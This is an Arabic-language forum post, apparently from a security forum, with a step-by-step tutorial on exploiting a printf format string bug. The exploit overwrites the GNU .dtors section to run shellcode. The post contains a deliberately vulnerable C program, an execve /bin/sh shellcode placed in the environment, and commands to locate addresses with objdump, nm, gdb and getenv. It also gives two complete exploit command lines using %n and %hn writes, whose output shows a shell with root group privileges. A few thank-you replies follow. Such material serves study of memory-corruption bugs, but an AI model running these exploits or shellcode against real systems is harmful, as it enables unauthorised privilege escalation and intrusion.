|
|| ~ Format string - .dtors section ~ || السلام عليكم... وطريقه استغلالها بشكل متطور format string بتكلم اليوم عن ثغرات printf ثغرات الفورمات سترينق تكون في دوال printf, fprintf, sprintf, snprintf, vprintf, vfprintf, vsprintf, vsnprintf المستخدم في داله stringوهي عباره عن غلطات او هفوات المبرمجين , عند استخدامهم لهذي الدوال من غير تعريف ال بالفورمات باراميتر printf هناك انواع كثيره من الفورمات باراميترز مثل: unsigned hexadecimal - للقرائه من الميموري بصيغة x% decimal - للقرائه من الميموري بصيغة d% unsigned decimal - للقرائه من الميموري بصيغة %u سترينق - %s للكتابه على الميموري - n% لكتابة 16 بت على الميموري بدلا من 32 بت - hn% الي بيهمنا هو القرائه والكتابه على الميموري. نجيب كود مضروب ونشرح عليه احسن كود: #include <%stdio.h%> #include <%string.h%> int main(int argc, char **argv) { char buf[1024]; strncpy(buf, argv[1], sizeof(buf) - 1); printf(buf); return 0; } استخدمت بدون تحديد الفورمات باراميتر فيها printf مثل ماشايفين, الداله في المدخلات %x نقدر نقرا بيانات من الميموري اذا استخدمنا مثلا [drdeath@SecureDeath lab]$ ./vulnf "%x%x%x%x" bfffde613f7078257825 [drdeath@SecureDeath lab]$ مثل ما نشوف طلعنا قيم من الميموري بصيغة الهيكس ديسمل. كود:الحين المطلوب منا ان نكتب الشل كود على الميموري, ونكتب عنوان الشل كود على عنوان من عناوين مسجلات الميموري, في موضوعنا eip السابق عن ثغرات فيض المكدس شرحنا كيف نكتب عنوان الشل كود على مسجل .dtors هذي المره بنشرح كيف نكتب عنوان الشل كود على عنوان كومبايلرز GNU الي هو عباره عن مسجل خاص ياتي مع يشتغل بعد ما يبدا البرنامج بالعمل يعني بعد ما تشتغل الداله .dtors وعنوان وهو ينظاف على البرنامج بشكل تلقائي بعد ما تعمل له كومبايل بال, main() يعني لو كتبنا على عنوان ,gcc عنوان الشل كود لنا بيشتغل الشل كود قبل ما ينهي البرنامج عمله, حلو هذا المطلوب dtor ممكن نطلعه بطريقتين .dtors اول شي بنطلع عناوين مثل ما تشوفون عنوان objdump الاولى عن طريق هو08049510 dtor [drdeath@SecureDeath lab]$ objdump -h vulnf | grep dtor 16 .dtors 00000008 08049510 08049510 00000510 2**2 بتشوفون عندنا عنوانين الاول بدايه ,nm الثانيه عن طريق و الثاني نهايته الي هو يزيد عن البدايه باربع بايتات dtor [drdeath@SecureDeath lab]$ nm vulnf | grep DTOR 08049514 d __DTOR_END__ 08049510 d __DTOR_LIST__ يعني على 08049514 dtors نحن نبغي نكتب على نهاية نبغي نكتب الشل كود على الميموري ونبغي نعرف عنوانه dtors الحين بعد ما طلعنا عنوان env بنكتب الشل كود على فاللينكس, ما تهمنا الطريقه الي نكتب فيها الشل كود على الميموري, المهم انه ينكتب وبس SHELLCODE بنعرف الشل كود على الاينفايرومنت باسم [drdeath@SecureDeath lab]$ export SHELLCODE=`perl -e 'print "\x90"x50,"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` env نتاكد ان الشل كود انكتب على كود: [drdeath@SecureDeath lab]$ echo $SHELLCODE ********************************************************************************************************************************************************************************************************************************* 1*********Ph//shh/bin******************PS*********ᙰ [drdeath@SecureDeath lab]$ تمام امورنا طيبه, الحين نبغي نعرف عنوان الشل كود, ممكن ان نعملها بالطريقه الكلاسيكيه عن طريق والبحث عن عناوين النوب gdb [drdeath@SecureDeath lab]$ gdb vulnf (gdb) b *main Breakpoint 1 at 0x80483b4 (gdb) run Starting program: /lab/vulnf Breakpoint 1, 0x080483b4 in main () (gdb) x/200x $esp .............. ........... ........... كود: 0xbfffde5c: 0x00396c65 0x4c454853 0x444f434c 0x90903d45 0xbfffde6c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffde7c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffde8c: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffde9c: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e 0xbfffdeac: 0x99e18953 0x80cd0bb0 0x45485300 0x2f3d4c4c ................ .......... ..... مثل ما شايفين شغلنا البرنامج المصاب بالديباقر, وبعدين عملنا *main في بداية البرنامج عند break point run وبعدين شغلنا البرنامج وتصفحنا الميموري , وحصلنا قيم النوب والشل كود بعدها. وخلاص بيشتغل الشل كود dtor نقدر ناخذ اي عنوان من عناوين النوب هذي ونكتبه على عنوان ههههههههههههه لا صبرو الموضوع بعده شويه مطول في كمن شغله نحتاج نسويها قبل. اوكيه هذي الطريقه الكلاسيكيه لايجاد عنوان الشل كود, نقدر بعد نستخدم طريقه ثانيه اسهل, وهي عن طريق استخدام داله في لغه السي getenv() اسمها هذا البرنامج الصغير بيعطينا عنوان الشل كود مباشره كود: #include <%stdio.h%> int main() { printf("%p",getenv("SHELLCODE")); return 0; } [drdeath@SecureDeath lab]$ vi egg.c [drdeath@SecureDeath lab]$ gcc egg.c -o egg [drdeath@SecureDeath lab]$ ./egg 0xbfffde7a البرنامج عطانا العنوان 0xbfffde7a كان كاتب برنامج خاص يحتوي على عدد من الشل كودز لانطمه مختلفه Qnix أخوي يقوم بحقن الشل كود في الانفايرومنت ويطعيك عنوانه مباشره http://www.0x80.org/code/app/envt/envt.c الحين نبغي نكتب ,dtors الحين حصلنا على عنوان الشل كود وعنوان ال 0xbfffde7a على 0x08049514 0 الى 32 بت وتحويله الى ديسملxbfffde7a بس اول شي بنحتاج نقسم العنوان %n علشان نقدر نكتبه بالفورمات باراميتر بنحول قيم الهيكس الى ديسمل ASCII table باستخدام http://www.asciitable.com/ او ممكن تستخدمون ادات التحويل من هيكس الى ديسمل http://drdeath.myftp.org:881/crypt.php http://www.v4-team.com/cc/images/smilies/Gm_016.gif bf = 191 ff = 255 de = 222 7a = 122 الحين بنقوم بعمليه حسابيه بسيطه, بنطرح كل قيمه من القيمه الي تحتها. بس اذا كانت القيمه الاولى اصغر من الثانيه بنضيف لها عدد 256 (role over) وبعدين بنقوم بالطرح الي تسمى بعملية قيمة bf=191 < ff=255 // نضيف لها 256 وبعدين بنطرح منها 255 191+256=447-255=192 قيمة ff=255 > de=222 // نطرح بشكل طبيعي 255-222=33 قيمة de=222 > 7a=122 // نطرح بشكل طبيعي 222-122=100 7 قيمةa=122 // أخر قيمة نطرحها دائما من 16 122-16=106 dtors الحين هذا القيم بنكتبها على اربع عناوين من عناوين نحن عندنا العنوان 0 بنزيد عليه بعد 3 عناوين بعده, يعني بيكون كالتاليx08049514 ff = 33 write on 0x08049516 de = 100 write on 0x08049515 7a = 106 write on 0x08049514 الحين بنحتاج نعرف كم فورمات باراميتر بنحتاج علشان نوصل لعنوان المدخل الي بنكتبه AAAA bfffde59 3ef 0 41414141 %x مثل ماتشوفون بعد حوالي اربع AAAA وجدنا مكان مدخلنا الي هو والي يقابله 41414141 ممكن انك تروح مباشره وتستعرض قيمة الخانه الرابعه بهذا الشكل AAAA41414141 بنكتب عناوين AAAA تمام, الحين بنعوض بدل الاربعه الي عندنا, يعني بتنكتب عناوين الديتورز على هذي الاماكن من الميموري dtors %5\$x %6\$x %7\$x وبالتالي على هذي الخانات بنروح وبنكتب عنوان الشل كود لنا, الي نحنا حولناه الى صيغه ديسمل 23 بت سنقوم بكتابة قيم الديسمل التي هي في الحقيقه عنوان الشل كود داخل عناوين الديتور. %x او %u و %nبنستخدم الاستغلال سيكون بالشكل التالي [drdeath@SecureDeath lab]$ ./vulnf `printf "\x14\x95\x04\x08\x15\x95\x04\x08\x16\x95\x04\ x08\ x17\x95\x04\x08"`%106x%4\$n%100x%5\$n%33x%6\$n%192 x%7\$n sh-3.1$ id uid=500(drdeath) gid=500(drdeath) groups=0(root),10(wheel),500(drdeath) sh-3.1$ opcode بصيغه dtorلكتاتب عناوين ال printf مثل ما شايفين, استخدمنا (little endianا (بطريقه عكسيه وفقا لبروسيسرات ال لكتابت قيم الديسمل على الاماكن الي حددناها الي هي تبدأ من 4 الى 7 %x و %n وبعدها استخدمنا الفورمات سترينق واشتغل معانا الشل وحصلنا على صلاحيات يوزر اخر الرووت حيث ان الملف المضروب يملك صلاحيات لليوزر رووت guid ممكن ايضا كتابت عنوان الشل كود على الديتور بصيغة ديسمل ولكن على شكل 16 بت , بدلا من 32 بت عنوان الشل كود الي هو 0xbfffde7a بنقسمه الى قسمين فقط بدل الاربع اقسام, وبنحوله الى ديسمل , النصف الاول بنطرحه من 8 والثاني بنطرحه من الاول. نطبق ونشوف 0xbfffde7a bfff=49151-8=49143 de7a=56954-49151=7803 الاستغلال بيكون نفس الاستغلال الي كتبناه قبل بس بدل %hn بنستخدم %n لكن عناوين الديتور بتكون فقط عنوانين 0x08049514 الاول بيكون 0x08049514+2 والثاني بيكون 0x08049516 الي هو بيكون de7a=7803 write on 0x08049514 الاستغلال بيكون بهذا الشكل drdeath@SecureDeath lab]$ ./vulnf `perl -e 'print "\x16\x95\x04\x08\x14\x95\x04\x08"'`%.49143u%4\$hn %.7803u%5\$hn sh-3.1$ id uid=500(drdeath) gid=500(drdeath) groups=0(root),10(wheel),500(drdeath) sh-3.1$ مثل ماشايفين ,اكتبنا قيم 16 بت ديسمل على قيم الديتور في العنوانين المحليين \$hnو %5 \$hn4% تعطي نفس الناتج ما تفرق %u استخدمنا %x وبدل واستخدمت ماتفرق كلهم يعطون نفس النتيجه printf في الاستغلال بدل perl ============= وياشباب انا ماني معصوم من الخطأ يعني إذا وجدتم خطأ ياليت لو تراسلوني على الخاص إتمنالكم التوفيق تشآآآآوز |
thanks |
منووووووووور |
يعطيك العآفية على السرح أخي الغآلي |
| الساعة الآن 11:00 AM |
[ vBspiders.Com Network ]